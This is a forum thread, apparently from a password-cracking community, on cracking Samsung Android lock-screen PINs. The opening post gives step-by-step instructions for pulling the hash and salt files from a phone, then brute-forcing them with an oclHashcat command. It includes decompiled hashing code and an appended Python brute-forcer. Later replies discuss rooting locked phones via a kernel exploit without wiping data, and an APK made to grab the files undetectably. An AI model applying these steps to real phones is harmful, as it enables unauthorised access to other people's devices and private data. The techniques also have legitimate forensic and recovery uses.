Breaking Samsung Android Passwords/PIN
#1
Step 1 : Get access to the data files

Step 2 : Get following files from the device :
"/data/system/password.key"
"/data/data/com.android.providers.settings/databases/settings.db"

Step 3 : Extract hash from password.key
example : "941d4637d8223d958d7f2324572c7e319dcea01f"

Step 4 : Extract seed from settings.db (using sqlite3 tool)
command: "sqlite3 settings.db"
>"SELECT lockscreen.password_salt from secure;"
example : "-660806340342588628"
convert to lowercase hex : "f6d45822728ddb2c"

Step 5 : use oclHashcat to brute-force (in this case we know the length and type of the password : 8 digits, decimals only) :
"./oclHashcat-plus64.bin -a 3 -n 80 -u 1024 -m 5800 941d4637d8223d958d7f2324572c7e319dcea01f:f6d45822728ddb2c ?d?d?d?d?d?d?d?d"

Done.

How it works :
SHA1 is being used with 1024 iterations

Step 0 : Iteration in ASCII + Password + Seed => SHA1 Hash
Example using pwd "test" : 0testf6d45822728ddb2c

Steps 1 to 1023 : SHA1 hash of previous round + Iteration in ASCII + Password + Seed => SHA1 Hash
Example : {previous sha1 hash in binary}1testf6d45822728ddb2c
...
{previous sha1 hash in binary}1023testf6d45822728ddb2c

The algorithm can be reversed from libsec.ko or framework2.odex

Resulting hash is the hash from password.key

framework2 relevant source code :
Code:
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import android.util.Log;

// Decompiled from LockPatternUtils in framework2.odex. getSalt() and toHex()
// are other methods of the same class: getSalt() returns the
// lockscreen.password_salt value as the hex string used above, toHex()
// hex-encodes a byte array.
public byte[] passwordToHash(String paramString)
  {
    if (paramString == null)
      return null;
    String str = null;
    byte[] arrayOfByte1 = null;
    try
    {
      // password + salt, fed into every round
      byte[] arrayOfByte2 = (paramString + getSalt()).getBytes();
      byte[] arrayOfByte3 = null;   // digest of the previous round
      str = "SHA-1";
      MessageDigest localMessageDigest = MessageDigest.getInstance(str);
      long l1 = System.currentTimeMillis();
      for (int i = 0; i < 1024; i++)
      {
        arrayOfByte1 = null;
        if (arrayOfByte3 != null)
          localMessageDigest.update(arrayOfByte3);      // raw bytes of previous digest (absent in round 0)
        localMessageDigest.update(("" + i).getBytes()); // round counter as ASCII decimal
        localMessageDigest.update(arrayOfByte2);        // password + salt
        arrayOfByte3 = localMessageDigest.digest();     // digest() also resets the MessageDigest
      }
      arrayOfByte1 = toHex(arrayOfByte3).getBytes();  // hex of the final digest = contents of password.key
      long l2 = System.currentTimeMillis();
      Log.w("LockPatternUtils", "passwordToHash time = " + (l2 - l1) + "ms");
      return arrayOfByte1;
    }
    catch (NoSuchAlgorithmException localNoSuchAlgorithmException)
    {
      Log.w("LockPatternUtils", "Failed to encode string because of missing algorithm: " + str);
    }
    return arrayOfByte1;
  }
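Added example (not part of bkerler's post, and not Samsung's or Android's own code): a Python re-implementation of the 1024-round loop above, plus the salt conversion from step 4 and a small mask-based brute force so the algorithm can be checked without oclHashcat. The hash and salt constants are the values from the post; the `settings.db` stand-in is constructed here with the settings provider's name/value `secure` table layout, so the salt is read with `SELECT value ... WHERE name = 'lockscreen.password_salt'` (an assumption about the schema, not something shown in the post). Function names (`samsung_hash`, `crack`, `expand_mask`, etc.) are this example's own.

```python
import hashlib
import itertools
import sqlite3
import string

ROUNDS = 1024  # Samsung variant: 1024 chained SHA-1 rounds

# Values copied from the post: the 40-hex-char hash found in password.key
# and the raw signed 64-bit salt read from settings.db.
EXAMPLE_HASH = "941d4637d8223d958d7f2324572c7e319dcea01f"
EXAMPLE_RAW_SALT = -660806340342588628


def salt_to_hex(raw_salt: int) -> str:
    """Turn the signed 64-bit lockscreen.password_salt integer into the
    lowercase, unpadded hex string that getSalt() feeds into the hash
    (same result as Java's Long.toHexString: two's complement, no sign)."""
    return format(raw_salt & 0xFFFFFFFFFFFFFFFF, "x")


def read_salt(settings_db_path: str) -> int:
    """Read lockscreen.password_salt from the 'secure' table. It is a
    name/value table, so the setting is a row, not a column (assumed schema)."""
    con = sqlite3.connect(settings_db_path)
    try:
        row = con.execute(
            "SELECT value FROM secure WHERE name = 'lockscreen.password_salt'"
        ).fetchone()
    finally:
        con.close()
    if row is None:
        raise LookupError("lockscreen.password_salt not present")
    return int(row[0])


def samsung_hash(password: str, salt_hex: str) -> str:
    """Re-implementation of the passwordToHash() loop shown in the post:
         round 0:  SHA1("0" + password + salt)
         round i:  SHA1(raw digest of round i-1 + str(i) + password + salt)
    The lowercase hex of the round-1023 digest is what password.key holds."""
    pw_salt = (password + salt_hex).encode()
    prev = b""
    for i in range(ROUNDS):
        prev = hashlib.sha1(prev + str(i).encode() + pw_salt).digest()
    return prev.hex()


def expand_mask(mask: str):
    """Expand a minimal hashcat-style mask (?d, ?l, ?u; other chars literal)."""
    charsets = {"d": string.digits,
                "l": string.ascii_lowercase,
                "u": string.ascii_uppercase}
    columns = []
    i = 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask) and mask[i + 1] in charsets:
            columns.append(charsets[mask[i + 1]])
            i += 2
        else:
            columns.append(mask[i])
            i += 1
    for combo in itertools.product(*columns):
        yield "".join(combo)


def crack(target_hash: str, salt_hex: str, mask: str):
    """Walk the mask keyspace; return the matching candidate or None."""
    target = target_hash.lower()
    for candidate in expand_mask(mask):
        if samsung_hash(candidate, salt_hex) == target:
            return candidate
    return None


def make_test_db(path: str, raw_salt: int) -> None:
    """Constructed stand-in for settings.db (assumed 'secure' table layout)."""
    con = sqlite3.connect(path)
    with con:
        con.execute("CREATE TABLE IF NOT EXISTS secure ("
                    "_id INTEGER PRIMARY KEY AUTOINCREMENT, "
                    "name TEXT UNIQUE ON CONFLICT REPLACE, value TEXT)")
        con.execute("INSERT INTO secure (name, value) VALUES (?, ?)",
                    ("lockscreen.password_salt", str(raw_salt)))
    con.close()


if __name__ == "__main__":
    make_test_db("settings_demo.db", EXAMPLE_RAW_SALT)
    salt = salt_to_hex(read_salt("settings_demo.db"))
    print("hashcat -m 5800 line:", f"{EXAMPLE_HASH}:{salt}")
    # 4-digit demo PIN; the post's 8-digit keyspace is left to oclHashcat,
    # since this pure-Python loop does about 1024 SHA-1 calls per candidate.
    print("recovered:", crack(samsung_hash("1234", salt), salt, "?d?d?d?d"))
```

The salt conversion is the one part worth checking by hand: the post's `-660806340342588628` masked to 64 bits is `0xf6d45822728ddb2c`, matching step 4. Everything else is only as right as the decompiled loop above, so a candidate that hashcat accepts should reproduce the same 40-character string here.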
#2
well done :)
#3
Hm, how do you practically extract that? I am trying to extract it from a Samsung Galaxy S3. Of course /data/data and /data/system are not readable by the adb user, and it would require rooting the phone. But then we have one problem: even if USB debugging is enabled, you can't connect to the phone while it is locked to upload the new image. Another problem is that you might be required to unlock the bootloader (haven't done that, so not 100% sure), which according to what I read will erase user data, including the hashes.

Please correct me if I am wrong.
#4
(04-04-2013, 12:22 PM)gat3way Wrote: Hm, how do you practically extract that? I am trying to extract it from a Samsung Galaxy S3. Of course /data/data and /data/system are not readable by the adb user, and it would require rooting the phone. But then we have one problem: even if USB debugging is enabled, you can't connect to the phone while it is locked to upload the new image. Another problem is that you might be required to unlock the bootloader (haven't done that, so not 100% sure), which according to what I read will erase user data, including the hashes.

Please correct me if I am wrong.

It is possible to root without unlocking the bootloader, therefore you won't lose any data. This works on unpatched Samsung devices; see the Exynos kernel exploit linked below

http://forum.xda-developers.com/showthre...?t=2050297

another method

http://forum.xda-developers.com/showthre...?t=1894717

You could possibly craft an APK, which obviously will require root privileges, allowing you to grab the data. It won't exactly be 'undetected' if the user already has a rooted phone; if the phone can be exploited, then you could probably make it undetectable.
#5
That would work in case you have the phone unlocked (in the sense of the PIN already entered, not related to the bootloader). Still, if it is locked, you shouldn't be able to upload anything via adb. I guess one possibility would be to install one of those PIN unlock apps (which do not require root) and reboot, but that would require the Google Play account and the phone being connected to the internet at that time. But yes, that makes sense for PIN recovery - then you can root the phone and proceed.

BTW, is there some screen lock bypass trick for the Samsung S3? I've seen such from time to time... not for the S3 as far as I remember...
#6
A phone with PIN/pattern still answers to adb, so you can bypass the pattern lock. About root for the S3: if it enters the bootloader, then you simply write any root package via Odin.

hint: http://forum.xda-developers.com/showthre...?t=1695238
#7
Had ~30 min of headache thinking about where I saw a name similar to the theme author's nick. It's really interesting to see you here.
#8
The same works for the Nexus 7, but there is a difference: lockscreen.password_salt is not located in /data/data/com.android.providers.settings/databases/settings.db, but rather in /data/system/locksettings.db; the table is locksettings.

P.S. Correction: the Nexus 7 works the old way (just salted SHA1/MD5), so indeed that's Samsung-specific. Apparently I had a bug in my script to validate the algo.
#9
Thanks, Milen!
#10
(04-04-2013, 11:01 AM)bkerler Wrote: Step 5 : use oclhashcat to bruteforce (in this case we know length and type of password : 8 digits and decimals only) :
"./oclHashcat-plus64.bin -a 3 -n 80 -u 1024 -m 5800 941d4637d8223d958d7f2324572c7e319dcea01f:f6d45822728ddb2c ?d?d?d?d?d?d?d?d"

What version did you use?

I used v0.14 and it does not have hash type 5800. Where did you get a version with that type?

This is what I get on my testing:
Code:
D:\Downloads\oclHashcat-plus-0.14>oclHashcat-plus64.exe -a 3 -n 80 -u 1024 -m 5800 21faa15e0409fa961f0c2b2e8e2fde96cfe4a9e53bf54dbf16c58965f93bf164a6612c38:636bb8161c861503 ?d?d?d?d?d
Invalid --hash-type specified

Thanks in advance for the info!